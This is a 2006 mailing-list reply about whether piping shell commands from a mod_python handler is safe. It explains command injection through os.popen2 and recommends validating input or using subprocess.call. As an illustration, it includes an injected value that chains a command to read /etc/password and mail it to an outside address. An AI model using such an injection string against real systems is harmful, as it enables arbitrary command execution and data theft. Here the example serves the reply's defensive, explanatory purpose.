|
webograph
webograph at eml.cc
Tue Jul 25 06:55:22 EDT 2006
hi richard,
if you use a static command like "cmd", the script is perfectly all
right. you can easily run into problems if you pass unfiltered user data
to a command:
i, o = os.popen2("cmd files/%s" % user_input)
will get you into Very Big Trouble -- the user could pass "foo; cat
/etc/password | mail me at my.domain" to get list of users in your system,
for example -- in other words, execute arbitrary commands.
if you have to use user input to build commands:
- check if they are valid (if user_input in list_of_valid_options, for
example)
- escape everything properly or, even better, use process functions that
don't call the system's command interpreter (/bin/sh) on unix. use, for
example, subprocess.call (http://docs.python.org/lib/node236.html) -- no
matter what the user passes to subprocess.call(["openssl", "verify",
user_input]), the only process a malcious user can call is openssl.
regards
webograph
p.s. is there some configuration error in the mailing list? when i
replied 15 minutes ago, the mail was sent to the original sender
directly; afaik there should be some reply-to header appended by mailman
Richard Lewis wrote:
>Hi there,
>
>Just investigating some possible implementation methods.
>
>Does it pose a security risk in mod_python to do this sort of thing:
>
>def handler(req):
> # code is from memory so may not be correct
> # but its the idea thats important ;-)
> i, o = os.popen2("cmd")
> i.write("some data")
> i.close()
>
> req.write(o.read())
> o.close()
>
>I don't really understand it properly, but I've read before now that using
>pipes to execute shell commands from CGI scripts can be insecure. Does the
>same apply with Apache modules like mod_python?
>
>Cheers,
>Richard
>
>
|